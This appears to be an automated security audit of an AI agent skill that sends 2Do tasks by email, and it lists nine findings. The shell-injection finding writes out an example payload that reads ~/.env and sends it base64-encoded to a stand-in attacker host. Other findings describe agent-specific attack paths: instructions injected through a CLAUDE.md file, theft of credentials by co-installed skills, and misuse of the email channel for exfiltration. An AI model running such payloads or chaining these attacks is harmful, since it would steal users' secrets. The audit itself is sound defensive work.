Is chuckiefan/moltbot-plugin-2do safe?
https://github.com/openclaw/skills/tree/main/skills/chuckiefan/moltbot-plugin-2do
moltbot-plugin-2do is a well-architected TypeScript productivity skill for creating 2Do app tasks via email with natural language parsing. The code is clean, unit-tested, and carries no npm lifecycle hooks, git hooks, submodules, or hardcoded exfiltration endpoints. The principal concerns are a shell injection vector in the SKILL.md command template (user input substituted into a double-quoted bash argument without escaping guidance), an unreviewed CLAUDE.md file in the skill directory, and the inherent risk that SMTP credentials placed in process.env are accessible to all skills sharing the agent session.
Findings (9)
MEDIUM (-20) Shell injection via unescaped user input in SKILL.md bash command template
SKILL.md instructs the executing agent to run: bash {baseDir}/scripts/send-task.sh --raw "USER_MESSAGE_HERE". In bash, double-quoted strings do NOT prevent $(...) command substitution or backtick evaluation; only single quotes do. If the agent substitutes the user's message directly into that command string (naive string interpolation rather than passing the message as a separate argv element, or quoting it with printf '%q'-style escaping), a crafted user message such as 'add task: $(curl -s attacker.com/exfil?d=$(cat ~/.env|base64))' would execute the embedded command in the agent's shell before the value ever reaches Node.js, so no validation inside the TypeScript code can catch it. The SKILL.md provides no guidance on safe substitution, and no escaping helper is documented.
LOW (-5) CLAUDE.md file shipped with skill; content not audited
The skill directory contains a CLAUDE.md file at the top level. Claude Code and several AI agent runtimes automatically inject CLAUDE.md content into the model's context when processing the enclosing directory. If this file contains legitimate coding conventions for the plugin's development, it is benign. However, because its content was not included in the evidence, the possibility that it contains instructions intended to influence agent behavior during skill review or execution cannot be eliminated.
LOW (-15) Raw user message content transmitted via SMTP email to external inbox
src/email-sender.ts constructs an email body that includes rawInput (the verbatim user utterance) and sends it via nodemailer to config.twodoEmail using the caller-supplied SMTP credentials. While this is the stated purpose of the skill, it means that potentially sensitive context embedded in a user's natural language task request — including names, dates, project details, or inadvertent secrets — is routinely transmitted outside the local agent session to a remote email server and inbox.
LOW (-10) SMTP credentials stored in agent process environment expose secrets to co-resident skills
config.ts reads SMTP_HOST, SMTP_PORT, SMTP_USER, SMTP_PASS, and TWODO_EMAIL exclusively from process.env. Once these are set for this skill to function, they remain readable via process.env by all other code running in the same Node.js process or agent session for the lifetime of that session. A malicious co-installed skill could trivially read and exfiltrate these values; nothing in the skill scopes the secrets to its own code.
LOW (-15) Shell entry-point script present but content not examined in evidence
scripts/send-task.sh is the execution entry point referenced by SKILL.md and would be the first code run when the skill is invoked. The TypeScript source files (main.ts, task-parser.ts, date-parser.ts, email-sender.ts, config.ts) were all provided and are clean. However, the shell script content was not included in the evidence dump and therefore cannot be audited for unsafe patterns such as additional file reads, network calls, or unsafe handling of the --raw argument value before it reaches the Node.js CLI.
INFO (-10) Installation network activity limited to GitHub CDN; clean behavior
All TCP connections observed during skill installation targeted 140.82.121.4:443, which is within GitHub's CDN range. No connections to unexpected third-party hosts, analytics services, or C2 infrastructure were detected. The git sparse-checkout pattern was used to extract only the targeted skill subdirectory from the monorepo, consistent with the expected install procedure.
INFO (-5) Canary files read at two time points; attributed to audit framework baseline checks
Auditd PATH records and inotifywait events show read-only ACCESS to .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCP credentials at 1771902771.295 (before the git clone at 1771902776.829) and again at 1771902793.185 (post-analysis). The pre-clone access batch is consistent with the audit framework establishing a canary baseline, since no skill code had been fetched yet. All events show CLOSE_NOWRITE, i.e. no modifications. The monitoring system's own integrity report confirms no exfiltration, and none of the reviewed skill source code references these paths.
INFO (-12) Skill establishes persistent email channel exploitable in combination with file-reading skills
In isolation this skill is a straightforward productivity tool. However, its email transmission capability creates a data-exfiltration primitive: any skill or agent instruction that can read file contents could pass those contents as a task title or raw input to this skill, routing sensitive data through a legitimate-looking SMTP connection that is unlikely to be blocked by network controls or raise suspicion in logs. This compositional risk is inherent to any email-sending skill.
INFO (-10) SMTP credentials in shared process environment accessible to co-resident malicious skills
Because SMTP credentials are loaded into process.env, a co-installed malicious skill running in the same agent session could read these values and independently use them to send attacker-directed email, bypassing the user's intent and the skill's intended interface.